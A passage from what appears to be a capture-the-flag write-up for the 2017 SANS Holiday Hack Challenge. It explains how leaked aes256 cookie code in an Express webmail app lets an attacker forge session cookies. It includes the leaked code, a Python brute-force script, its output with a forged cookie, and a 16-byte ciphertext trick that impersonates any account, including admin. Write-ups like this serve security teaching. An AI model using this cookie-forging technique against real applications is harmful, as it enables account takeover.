            &lt;span class="nx"&gt;Materialize&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toast&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;Error: &amp;#39;&lt;/span&gt;&lt;span class="o"&gt;+&lt;/span&gt;&lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;status&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot; &amp;quot;&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nx"&gt;error&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;statusText&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;})&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="nx"&gt;Materialize&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;toast&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;You must put in a correct email and password!&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;4000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;But trying to go directly to this page just redirects us to the login page.
Let's continue our recon. Here's what we find in the &lt;code&gt;robots.txt&lt;/code&gt; file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/robots.txt&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;10.142.0.5&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="na"&gt;Cookie&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;EWA={&amp;quot;name&amp;quot;:&amp;quot;GUEST&amp;quot;,&amp;quot;plaintext&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;ciphertext&amp;quot;:&amp;quot;&amp;quot;}&lt;/span&gt;
&lt;/span&gt;&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.10.3 (Ubuntu)&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Thu, 28 Dec 2017 20:29:07 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;text/plain; charset=UTF-8&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;37&lt;/span&gt;
&lt;span class="na"&gt;Connection&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;close&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="na"&gt;X-Powered-By&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Express&lt;/span&gt;
&lt;/span&gt;
User-agent: *
&lt;span class="hll"&gt;Disallow: /cookie.txt
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Couple of interesting things. First, the application set us a cookie called
&lt;code&gt;EWA&lt;/code&gt;, with what seems to be our access level. I tried replaying the
cookie with values such as &lt;code&gt;ADMIN&lt;/code&gt;, etc. but it didn't work. Second, the
application is using the Express framework, which is based on NodeJS. We
now know the backend of the application. And finally, there is a file called
&lt;code&gt;cookie.txt&lt;/code&gt; in the application webroot, and the developper didn't want
this file to be indexed by search engine bots. So I guess it must be
interesting! Let's see.&lt;/p&gt;
&lt;p&gt;The file contains the following Javascript code:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="c1"&gt;//FOUND THESE FOR creating and validating cookies. Going to use this in node js&lt;/span&gt;
    &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nx"&gt;cookie_maker&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;need to put any length key in here&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="c1"&gt;//randomly generates a string of 5 characters&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;plaintext&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;rando_string&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;5&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
        &lt;span class="c1"&gt;//makes the string into cipher text .... in base64. When decoded this 21 bytes in total length. 16 bytes for IV and 5 byte of random characters&lt;/span&gt;
        &lt;span class="c1"&gt;//Removes equals from output so as not to mess up cookie. decrypt function can account for this without erroring out.&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ciphertext&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aes256&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;encrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;plaintext&lt;/span&gt;&lt;span class="p"&gt;).&lt;/span&gt;&lt;span class="nx"&gt;replace&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="sr"&gt;/\=/g&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="c1"&gt;//Setting the values of the cookie.&lt;/span&gt;
        &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;acookie&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;IOTECHWEBMAIL&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;&lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;stringify&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt;&lt;span class="s2"&gt;&amp;quot;name&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s2"&gt;&amp;quot;plaintext&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;plaintext&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;  &lt;span class="s2"&gt;&amp;quot;ciphertext&amp;quot;&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt;&lt;span class="nx"&gt;ciphertext&lt;/span&gt;&lt;span class="p"&gt;}),&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;maxAge&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;86400000&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;httpOnly&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;encode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="nb"&gt;String&lt;/span&gt; &lt;span class="p"&gt;}]&lt;/span&gt;
        &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;acookie&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
    &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nx"&gt;cookie_checker&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;){&lt;/span&gt;
        &lt;span class="k"&gt;try&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;need to put any length key in here&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;//Retrieving the cookie from the request headers and parsing it as JSON&lt;/span&gt;
            &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;thecookie&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;JSON&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;parse&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;req&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;cookies&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;IOTECHWEBMAIL&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="c1"&gt;//Retrieving the cipher text&lt;/span&gt;
            &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;ciphertext&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;thecookie&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;ciphertext&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
            &lt;span class="c1"&gt;//Retrievingin the username&lt;/span&gt;
            &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;username&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;thecookie&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;name&lt;/span&gt;
            &lt;span class="c1"&gt;//retrieving the plaintext&lt;/span&gt;
            &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;plaintext&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;aes256&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;decrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;ciphertext&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="c1"&gt;//If the plaintext and ciphertext are the same, then it means the data was encrypted with the same key&lt;/span&gt;
            &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;plaintext&lt;/span&gt; &lt;span class="o"&gt;===&lt;/span&gt; &lt;span class="nx"&gt;thecookie&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;plaintext&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;username&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;else&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
                &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="p"&gt;}&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;catch&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
            &lt;span class="nx"&gt;console&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;log&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;e&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
            &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;callback&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kc"&gt;false&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="p"&gt;};&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;So, we seem to have found the code that is use to generate the &lt;code&gt;EWA&lt;/code&gt;
cookie. Here's how it seems to work:&lt;/p&gt;
&lt;ol class="arabic simple"&gt;
&lt;li&gt;The server generates a five-letter random string (variable &lt;code&gt;plaintext&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;This string is encrypted using AES256 (variable &lt;code&gt;ciphertext&lt;/code&gt;, with a fixed key (variable &lt;code&gt;key&lt;/code&gt;).&lt;/li&gt;
&lt;li&gt;The username, the random string, and its encrypted value, are put in the cookie.&lt;/li&gt;
&lt;li&gt;To check the cookie, the server decrypts the encrypted value, and compares it to the random string sent in the cookie.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;At first, I tried generating a cookie, using the key &lt;code&gt;need to put any length key in here&lt;/code&gt;,
hoping that the developper had not changed this section of the source code, but
it didn't work. So we don't know the key. But there are still some glaring
errors in this cookie generation code.&lt;/p&gt;
&lt;p&gt;First, let's take a look at the &lt;a class="reference external" href="https://www.npmjs.com/package/aes256"&gt;aes256 NodeJS module&lt;/a&gt;.
I installed NodeJS and this module, and played around with it:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;aes256&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nx"&gt;require&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;aes256&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kc"&gt;undefined&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;key&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;my milkshake brings all the boys to the yard&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kc"&gt;undefined&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="kd"&gt;var&lt;/span&gt; &lt;span class="nx"&gt;plaintext&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;1337&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kc"&gt;undefined&lt;/span&gt;
&lt;span class="o"&gt;&amp;gt;&lt;/span&gt; &lt;span class="nx"&gt;aes256&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;encrypt&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;key&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;plaintext&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="s1"&gt;&amp;#39;L07kb9VSHbavnunjI/4aom8KcS4=&amp;#39;&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Let's take a look at our ciphertext:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt;  &lt;span class="nb"&gt;echo&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;L07kb9VSHbavnunjI/4aom8KcS4=&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; base64 -d &lt;span class="p"&gt;|&lt;/span&gt; hexdump -C
&lt;span class="go"&gt;00000000  2f 4e e4 6f d5 52 1d b6  af 9e e9 e3 23 fe 1a a2  |/N.o.R......#...|&lt;/span&gt;
&lt;span class="go"&gt;00000010  6f 0a 71 2e                                       |o.q.|&lt;/span&gt;
&lt;span class="go"&gt;00000014&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Hmmm, our output is 20 bytes, which is not a multiple of AES block-size. This
is weird. The first block of our ciphertext (16 bytes) must be the
initialization vector, which leaves a 4-byte block. Incidently, 4 bytes is
exactly the size of our plaintext. After several manual tries, I confirmed that
the plaintext and the ciphertext have the same size, which is the first oops.&lt;/p&gt;
&lt;p&gt;The second oops is that the cookie verification code does not perform any check
on the payload sent in the cookie. So it will happily accept one-byte long
payload &lt;span class="strike"&gt;(but unfortunately, not empty payload)&lt;/span&gt; &lt;strong&gt;(it actually does,
see after)&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;So, if we send a one-byte long payload, there are only 256 possible values for
the ciphertext, which is easily bruteforceable on line. Here's a Python script
that will try to find a valid cookie:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="ch"&gt;#!/usr/bin/env python3&lt;/span&gt;

&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;base64&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;requests&lt;/span&gt;
&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;time&lt;/span&gt;

&lt;span class="k"&gt;def&lt;/span&gt; &lt;span class="nf"&gt;main&lt;/span&gt;&lt;span class="p"&gt;():&lt;/span&gt;
    &lt;span class="c1"&gt;# The URL we try to access&lt;/span&gt;
    &lt;span class="n"&gt;url&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;http://10.142.0.5/account.html&amp;#39;&lt;/span&gt;

    &lt;span class="c1"&gt;# Our cookie template, with a one-byte long plaintext&lt;/span&gt;
    &lt;span class="n"&gt;cookie_template&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;{{&amp;quot;name&amp;quot;:&amp;quot;alabaster.snowball@northpolechristmastown.com&amp;quot;,&amp;quot;plaintext&amp;quot;:&amp;quot;a&amp;quot;,&amp;quot;ciphertext&amp;quot;:&amp;quot;{}&amp;quot;}}&amp;#39;&lt;/span&gt;

    &lt;span class="c1"&gt;# Our arbitrary IV&lt;/span&gt;
    &lt;span class="n"&gt;iv&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="sa"&gt;b&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt;&lt;span class="se"&gt;\x90&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt; &lt;span class="mi"&gt;16&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="n"&gt;candidate&lt;/span&gt; &lt;span class="ow"&gt;in&lt;/span&gt; &lt;span class="nb"&gt;range&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="mi"&gt;256&lt;/span&gt;&lt;span class="p"&gt;):&lt;/span&gt;
        &lt;span class="c1"&gt;# We create our candidate cipher text, by appending the one-byte value&lt;/span&gt;
        &lt;span class="c1"&gt;# to our IV, and base64 encoding it&lt;/span&gt;
        &lt;span class="n"&gt;ciphertext&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;base64&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;b64encode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;iv&lt;/span&gt; &lt;span class="o"&gt;+&lt;/span&gt; &lt;span class="nb"&gt;bytes&lt;/span&gt;&lt;span class="p"&gt;([&lt;/span&gt;&lt;span class="n"&gt;candidate&lt;/span&gt;&lt;span class="p"&gt;]))&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;decode&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;utf8&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# We then create our cookie, and get the wanted page&lt;/span&gt;
        &lt;span class="n"&gt;cookies&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="s1"&gt;&amp;#39;EWA&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="n"&gt;cookie_template&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;format&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;ciphertext&lt;/span&gt;&lt;span class="p"&gt;)}&lt;/span&gt;
        &lt;span class="n"&gt;r&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;requests&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;get&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;url&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;cookies&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="n"&gt;cookies&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;

        &lt;span class="c1"&gt;# If we get a positive return, we output the cookie&lt;/span&gt;
        &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;status_code&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="mi"&gt;200&lt;/span&gt; &lt;span class="ow"&gt;and&lt;/span&gt; &lt;span class="n"&gt;r&lt;/span&gt;&lt;span class="o"&gt;.&lt;/span&gt;&lt;span class="n"&gt;text&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;&amp;lt;script&amp;gt;window.location.href=&lt;/span&gt;&lt;span class="se"&gt;\&amp;#39;&lt;/span&gt;&lt;span class="s1"&gt;/&lt;/span&gt;&lt;span class="se"&gt;\&amp;#39;&lt;/span&gt;&lt;span class="s1"&gt;&amp;lt;/script&amp;gt;&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;::&lt;/span&gt;
            &lt;span class="k"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;cookies&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
            &lt;span class="k"&gt;break&lt;/span&gt;

&lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="vm"&gt;__name__&lt;/span&gt; &lt;span class="o"&gt;==&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39;__main__&amp;#39;&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt;
    &lt;span class="n"&gt;main&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We launch our script through &lt;code&gt;proxychains&lt;/code&gt; and...&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; proxychains ./cookie_finder.py
&lt;span class="go"&gt;ProxyChains-3.1 (http://proxychains.sf.net)&lt;/span&gt;
&lt;span class="go"&gt;|S-chain|-&amp;lt;&amp;gt;-127.0.0.1:4242-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-10.142.0.5:80-&amp;lt;&amp;gt;&amp;lt;&amp;gt;-OK&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;{&amp;#39;EWA&amp;#39;: &amp;#39;{&amp;quot;name&amp;quot;:&amp;quot;alabaster.snowball@northpolechristmastown.com&amp;quot;,&amp;quot;plaintext&amp;quot;:&amp;quot;a&amp;quot;,&amp;quot;ciphertext&amp;quot;:&amp;quot;kJCQkJCQkJCQkJCQkJCQkGk=&amp;quot;}&amp;#39;}&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Bingo! We get a valid cookie for Alabaster's account!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&amp;lt;Errata&amp;gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;After solving this part, I checked the hints given by the Elf of this level,
Pepper Minstix:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;AES256? Honestly, I don't know much about it, but Alabaster explained the
basic idea and it sounded easy. During decryption, the first 16 bytes are
removed and used as the initialization vector or &amp;quot;IV.&amp;quot; Then the IV + the
secret key are used with AES256 to decrypt the remaining bytes of the
encrypted string.&lt;/p&gt;
&lt;p&gt;Hmmm. That's a good question, I'm not sure what would happen if the
encrypted string was only 16 bytes long.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So the system does in fact accept empty &lt;code&gt;plaintext&lt;/code&gt; variables, with
any &lt;code&gt;ciphertext&lt;/code&gt; that is 16-byte long. So using this cookie works:
&lt;code&gt;{&amp;quot;name&amp;quot;:&amp;quot;alabaster.snowball&amp;#64;northpolechristmastown.com&amp;quot;,&amp;quot;plaintext&amp;quot;:&amp;quot;&amp;quot;,&amp;quot;ciphertext&amp;quot;:&amp;quot;QUFBQUFBQUFBQUFBQUFBQQo=&amp;quot;}&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;I was sure to have checked this, but obviously I'm mistaken (that's an oops for
me)!&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;&amp;lt;/Errata&amp;gt;&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;Alright, now we have a valid cookie for Alabaster's account. Or any account
really. This is the third oops: there's no link between the &lt;code&gt;name&lt;/code&gt; set in
the cookie, and the &lt;code&gt;plaintext&lt;/code&gt; and &lt;code&gt;ciphertext&lt;/code&gt; variables. So now
that we have found a valid ciphertext for our plaintext &lt;code&gt;a&lt;/code&gt;, we can put
anything we want in the &lt;code&gt;name&lt;/code&gt; variable, such as
&lt;code&gt;admin&amp;#64;northpolechristmastown.com&lt;/code&gt;, and we'll be logged into the given
account:&lt;/p&gt;
&lt;img alt="ewa_alabaster_account.png" class="align-center" src="/images/sans-christmas-challenge-2017/ewa_alabaster_account.png" /&gt;
